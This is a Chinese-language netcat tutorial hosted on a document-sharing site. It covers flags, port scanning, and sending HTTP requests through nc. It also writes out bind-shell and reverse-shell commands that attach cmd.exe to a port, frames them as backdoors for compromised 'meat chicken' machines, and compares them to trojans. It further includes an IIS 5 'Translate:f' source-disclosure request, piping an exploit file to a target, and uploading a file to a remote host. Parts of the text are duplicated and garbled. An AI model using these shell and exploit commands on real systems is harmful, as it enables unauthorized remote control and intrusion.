网络nc程序详解及使用方法总结

上传人:z**** 文档编号:114027510 上传时间:2022-06-27 格式:DOC 页数:8 大小:61.50KB
收藏 版权申诉 举报 下载
网络nc程序详解及使用方法总结_第1页
第1页 / 共8页
网络nc程序详解及使用方法总结_第2页
第2页 / 共8页
网络nc程序详解及使用方法总结_第3页
第3页 / 共8页
资源描述:

《网络nc程序详解及使用方法总结》由会员分享,可在线阅读,更多相关《网络nc程序详解及使用方法总结(8页珍藏版)》请在装配图网上搜索。

1、、基本使用 想要连接到某处: nc -options hostname ports ports 绑定端口等待连接: nc -l -p port -options hostname port 参数:-e prog 程序重定向,一旦连接,就执行 危险!-g gateway source-routing hop points, up to 8-G num source-routing pointer: 4, 8, 12, -h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的 IP 地址,不能用 hostname-o file 记录 16 进制的传输-p port 本地

2、端口号-r 任意指定本地及远程端口-s addr 本地源地址-u UDP 模式-v详细输出用两个-V可得到更详细的内容-w secs timeout 的时间-z 将输入输出关掉用于扫描时 其中端口号可以指定一个或者用lo-hi式的指定范围。 例如:扫描端口tcp 扫描C:ncnc -v -z -w2 192.168.0.80 1-140net 192.168.0.80 140 (?)net 192.168.0.80 139 (netbios-ssn) opennet 192.168.0.80 138 (?)net 192.168.0.80 137 (netbios-ns)net 192.168

3、.0.80 136 (?)net 192.168.0.80 135 (epmap) opennet 192.168.0.80 81 (?) opennet 192.168.0.80 80 (http) opennet 192.168.0.80 79 (finger)net 192.168.0.80 25 (smtp) opennet 192.168.0.80 24 (?)net 192.168.0.80 23 (telnet)net 192.168.0.80 21 (ftp) udp 扫描C:ncnc -u -v -z -w2 192.168.0.80 1-140 net 192.168.0.

4、80 140 (?) open net 192.168.0.80 139 (?) opennet 192.168.0.80 138 (netbios-dgm) opennet 192.168.0.80 137 (netbios-ns) opennet 192.168.0.80 54 (?) opennet 192.168.0.80 53 (domain) opennet 192.168.0.80 38 (?) opennet 192.168.0.80 37 (time) opennet 192.168.0.80 7 (echo) open二、高级应用1.IE 的 MIME 欺骗这个网站 目录提

5、供了 黑客的 n 关,过了 这 n 关 证明你开始 入门了。我做 的 的国产版。这个页面告诉我们的浏览器不是IE6.72,我们的*作系统不是LIUNX,我们不是从 重定向链接过去的, linux 有 IE6.72? 微软会在它的页面上放 的链接?nc 221.10.222.34 80GET /level/level7.php HTTP/1.1 Accept:image/gif,image/x-xbitmap,application/msword,*/* Referer: Accept-Language:zh-cn Accept-Encodeing:gzip,deflate User-Agent

6、:Mozilla/4.0 (compatible;MSIE6.72;Linux i686) Host:221.10.222.34 Connection:Keep-Alive 2.IIS 5 “Translate:f” 显示代码脆弱点Translate:f 脆弱点的机制:发送一个畸形的 HTTP GET 请求给服务器方一个可执行脚本或相 关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机 上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器 上运行。这种畸形的 HTTP GET 请求的关键特性是该请求的末尾有一个特定的头

7、信息 Translated,并有一个反斜杠”附于URL之后。下面就有这样的一个例子(CRLF代表回车 字符)注意GET global.asa后的反斜杠以及Translated头信息。GET /global.asa HTTP/1.0User-Agent:SensePostDataContent-Type:application/x-www-dorm-urlencodedTranslate:dCRLF CRLF将以上内容保存在一个文本文件中(例如 example.txt) 然后向一个有这个漏洞的服务器发送c:type example.txt | nc -vv 192.168.0.80 80(UNK

8、NOWN) 192.168.0.80 80 (?) openHTTP/1.1 200 OKServer: Microsodt-IIS/5.0Date: Tue, 03 Dec 2002 08:50:46 GMTContent-Type: application/octet-streamContent-Length: 2790ETag: “0448299fcd6df1:bea”Last-Modified: Wed, 13 Nov 2002 18:50:46 GMTAccept-Ranges: bytesCache-Control: no-cache举例:1)连接到 REMOTE 主机,例子:格式

9、:nc -nvv 192.168.x.x 80讲解:连到的TCP80端口2)监听 LOCAL 主机,例子:格式: nc -l -p 80讲解:监听本机的 TCP80 端口3)扫描远程主机,例子:格式: nc -nvv -w2 -z 192.168.x.x 80-445讲解:扫描的TCP80到TCP445的所有端口4)REM0TE主机绑定SHELL,例子:格式: nc -l -p 5354 -t -e c:winntsystem32cmd.eXe讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口5)REMOTE 主机绑定 SHELL 并反向连接,例子:格式: nc

10、 -t -e c:winntsystem32cmd.eXe 192.168.X.X 5354讲解:绑定REMOTE主机的CMDSHELL并反向连接到的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令”|”与重定向命令”“等等命令功能更强大)。高级用法:6)作攻击程序用,例子:格式 1: type.eXe c:eXploit.tXt|nc -nvv 192.168.X.X 80格式 2: nc -nvv 192.168.X.X 80 c:log.tXt讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到ulog.txt 中,如果把改为即

11、可以追加日志附: c:log.tXt 为日志等9)作蜜罐用3,例子:格式 1: nc -L -p 80 e:log.datnc -l -v -p port参数解释:-1:监听端口,监听入站信息-p:后跟本地端口号-V:显示端口的信息,如果使用-VV的话,则会显示端口更详细的信息提示:一般大家都爱用-VVnc -l -p 80这个很简单,监听 80 端口如果机器上运行这个命令,端口 80 被认为是开放的,可以欺骗很多扫描器的哦!nc -l -p 80 e:log.dat呵呵,功能和上边一样,但是后边加了个“e:log.dat”我想,学过ECHO 那个命令的人都会知道吧,是在E盘创建一个log.d

12、at的日志文件nc -l -V -p 80 和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着 NC的屏幕上。 呵呵,讲了这么多,来实践下nc -l -V -p 80然后在浏览器中输入本机 IP: 呵呵,看到什么? 同样,上边两个也是一样,大家自己试验一下吧命令 2:程序定向nc -l -p port -t -e cmd.exe本地机: nc -l -p port 或 nc -l -V -p port目标机: nc -e cmd.exe ip port参数解释:-l、-p 两个参数已经解释过了-e;作用就是程序定向-t:以telnet的形式来应答例子nc -l -p 5277 -

13、t -e cmd.exe 知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器 就会变成一台 TELNET 的服务器了,呵呵,解释一下:监听本地端口 5277的入站信息,同时将CMD.exe这个程序,重定向到端口 5277上,当有人连接的时候,就让程 序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。(话 外音:说这么多遍当我们白痴啊,快往下讲!) 呵呵,咱们来找台肉鸡试试,我 TELNET IP 5277HOHO 如何?local machine: nc -l -p port ( or nc -l

14、-v -p port ) remote machine:nc -e cmd.exe ip port 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马, 什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说 不用从你的 client 端向对方主机上运行的 server 端发送请求连接,而是对方主动来连接你 这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。 这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么? 咳!听我给你讲啊!(先交 100000000RMB 学费)哇,别杀我啊!) nc -l -p 5277 (坚听本地 5277端口)

15、 同样也可以用 nc -l -v -p 5277 运行在本地 然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277(你可别真的打“ip”在肉机上啊)要打,这样! 呵呵,看看在本地机器上出现了什么? 这样就是反弹在本地机器上得到了一个 SHELL 命令 3:扫描端口 nc -v ip port nc -v -z ip port-port nc -v -z -u ip port-port 参数解释:-z:将输入输出关掉,在扫描时使用nc -v ip port 这个命令是针对某一个端口进行扫描 例如:nc -v ip 135扫描远程主机的 135 端口,这样获得了该端口的一些简单

16、信息,但是针对某些端口,我们还 可以获得更多的信息 例如: 80 端口我们可以使用nc -v ip 80然后使用get方法来获得对方的WEB服务器的信息 nc -v -z ip port-port这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定 了扫描的端口范围 例如:nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数, 是用来扫UDP端口的 例如:nc -v -z -u ip 1-200

17、这个命令就会扫 1-200 的 UDP 端口命令4:传送文件(HOHO,丨LIKE )LOCAL MACHINE: nc -v -n ip port y:svr.exe参数解释:-n:指定数字的IP地址这两个命令结合起来是用来传送文件的 首先,在远程机上运行命令:nc -v -l -p 5277 c:pulist.exe 这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听 5277端口 并把接受到的信息数据写到 c:pulist.exe 中这时候在本地机上运行nc -v -n ip 5277 e:hackpulist.exe这个命令的意思就是,从本地 E 盘跟目录中读取 p

18、ulist.exe 文件的内容,并把这些数据发送 到 ip 的 5277 端口上这样远程主机就会自动创建一个 pulist.exe 文件。呵呵,你想到了吗?上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精 彩的命令来,因为NC的用法不仅仅局限于这几种而已哦! !对NC来说,只有想不到,没有做不到的! ! ! 后注:本文不是我原创,是暝暝网友的作品,来源不记得了,但是值得一看,大家看看吧!测试客体资源为网络时可能用到的命令:nc -l -p 888 -vv-e cmd.exe 打开本地888端口并进行监听,有外部对本地888端口连接 时即执行 cmd.exenc

19、-vv 192.168.182.128 80 链接某 IP 的 80 端口进行交互nc -l -p 888 -vv打开本机888端口,回显详细信息netcat 被誉为网络安全界的瑞士军刀,相信没有什么人不认识它吧一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成 一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具, 能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一 个是由红与黑编

20、译后的新浓缩版。浓缩版的主程序只有10多KB(10多KB的NC是不能完成下面所说的 第 4、第 5 种使用方法,有此功能的原版NC好象要60KB: P),虽然体积小,但很完成很多工作。软件介绍:工具名:Netcat作者: Hobbit & Chris Wysopal网址: 类别:开放源码平台: Linux/BSD/Unix/WindowsWINDOWS 下版本号: v1.10 NT参数介绍:nc.exe -h即可看到各参数的使用方法。基本格式: nc -options hostname ports ports . nc -l -p port options hostname port-d 后台

21、模式-e prog 程序重定向,一旦连接,就执行 危险!-g gateway source-routing hop points, up to 8-G num source-routing pointer: 4, 8, 12, .-h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-L 连接关闭后,仍然继续监听-n 指定数字的 IP 地址,不能用 hostname-o file 记录 16 进制的传输-p port 本地端口号-r 随机本地及远程端口-s addr 本地源地址-t 使用 TELNET 交互方式-u UDP 模式-v详细输出-用两个-v可得到更详细的内容-w se

22、cs timeout 的时间-z 将输入输出关掉-用于扫描时端口的表示方法可写为M-N的范围格式。基本用法: 大概有以下几种用法:1)连接到 REMOTE 主机,例子:格式:nc -nvv 192.168.x.x 80讲解:连到的TCP80端口2)监听 LOCAL 主机,例子:格式: nc -l -p 80讲解:监听本机的 TCP80 端口3)扫描远程主机,例子:格式: nc -nvv -w2 -z 192.168.x.x 80-445讲解:扫描的TCP80到TCP445的所有端口4)REM0TE主机绑定SHELL,例子:格式: nc -l -p 5354 -t -e c:winntsyste

23、m32cmd.eXe讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口5)REMOTE 主机绑定 SHELL 并反向连接,例子:格式: nc -t -e c:winntsystem32cmd.eXe 192.168.X.X 5354讲解:绑定REMOTE主机的CMDSHELL并反向连接到的TCP5354端口以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令|与重定向命令等等命令功能更强大 )。高级用法:6)作攻击程序用,例子:格式 1: type.eXe c:eXploit.tXt|nc -nvv 192.168.X.X 80格式 2: nc -nvv 192.168.X.X 80 c:log.txt讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt 中,如果把改为即可以追加日志附: c:log.txt为日志等9)作蜜罐用3,例子:格式 1: nc -L -p 80 c:honeypot.txt格式2: type.exe c:honeypot.txt|nc -L -p 80讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容送 入其管道中!

展开阅读全文
温馨提示:
1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2: 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
3.本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!